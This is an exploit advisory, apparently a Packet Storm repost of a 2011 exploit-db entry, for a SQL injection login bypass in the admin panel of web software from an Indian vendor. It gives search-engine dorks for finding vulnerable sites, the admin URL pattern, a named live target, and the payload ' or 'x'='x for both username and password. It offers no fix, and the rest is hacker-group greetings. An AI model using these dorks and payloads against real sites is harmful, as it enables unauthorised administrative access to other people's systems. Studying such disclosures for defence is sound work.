The administrative interface in code from "Powered by Nilson Solution, India" appears to suffer from a remote SQL injection vulnerability that allows for authentication bypass.
d6b182123362a85a05227586b30896189654f2a52fb6abb5a0a83a202d7d2e21# Exploit Title: SQL Injection Admin Bypass exploit
# Date: 08/02/2011
# Author: eXeSoul
# Author Mail: exe[dot]soul@live[dot].com
# Vendor: www.nilson-solution.com
# Live Demo: www.mehtasoft.com/admin/
# category: SQL Injection
# Version: WebApps
# Tested on: Windows
# VCE: ()
----------------------------------------------------------------------------------------------------------
##########################################################################################################
#Greetz to all Indian Hackers , Indian Cyber Army[ICA] ,Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#
#Thanks: I-H Guru,SaiSatish,FB1H2S,Micr0,Dark_Blue,c00lt04d,X__HMG,Th3 RDX,X_Cobra_X,AK-47
#
#Shoutz: r45c4l,Yash,M.R SK, Hacker Cyclone, Neo Hacker,S1layer,B0N3,NazZ
#
#Catch us at www.indshell.in
##########################################################################################################
#D0rk:- (i) "Powered by: Nilson Solution, India"
(ii) "inurl:admin/default.asp"
Exploited Link:- http://[site].com/admin/default.asp
#Exploit sql injection
user :- ' or 'x'='x
password:- ' or 'x'='x
# JAY HIND.!! JAY SHREE RAM.!! JAY SHREE KRISHANA.!! JAY MAHADEV.!!
# eXploit-db.com [8-2-2011]
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed